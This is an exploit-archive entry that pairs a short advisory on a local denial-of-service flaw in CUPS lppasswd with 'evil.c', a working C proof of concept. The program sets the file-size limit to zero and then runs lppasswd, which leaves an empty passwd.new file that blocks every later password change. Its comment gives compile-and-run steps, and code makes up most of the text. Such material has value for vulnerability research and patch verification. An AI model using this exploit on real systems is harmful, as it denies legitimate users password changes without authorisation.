// source: https://www.securityfocus.com/bid/12005/info
Easy Software Products lppasswd is prone to a locally exploitable denial of service vulnerability. This issue occurs when the program attempts to write a file to the system that will exceed any file size resource limits in place. This presents a vulnerability since an unprivileged user with CUPS credentials may set these resource limits and then invoke the application. This will create an empty '/usr/local/etc/cups/passwd.new' file. If this file is present, then future invocations of lppasswd will fail.
Successful exploitation will prevent users from changing their CUPS passwords with lppasswd.
/*
* evil.c
* 2004.12.11
* Bartlomiej Sieka
*
* This program executes the lpasswd(1) password changing utility
* in way that prevents its further use, i.e. after this program
* has been executed, all users on the system will be unable to change
* their CUPS passwords. This is not a documented feature of lppasswd(1)
* and is certainly unauthorized.
*
* This program has been tested with lppasswd(1) versions 1.1.19 and
* 1.1.22 on FreeBSD 5.2.
*
* The recipe:
* gcc -o evil evil.c
* ./evil
* Type in passwords as requested, and voila! This will create an empty
* file /usr/local/etc/cups/passwd.new. The existence of this file makes
* lppasswd(1) quit before changing users password with message
* "lppasswd: Password file busy!".
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
extern char **environ;
int main(int argc, char **argv){
char *cmd = "/usr/local/bin/lppasswd";
char *args[] = { "/usr/local/bin/lppasswd", 0x00 };
/* set the file size limit to 0 */
struct rlimit rl;
rl.rlim_cur = 0;
rl.rlim_max = 0;
setrlimit(RLIMIT_FSIZE, &rl);
/* execute the poor victim */
execve(cmd, args, environ);
}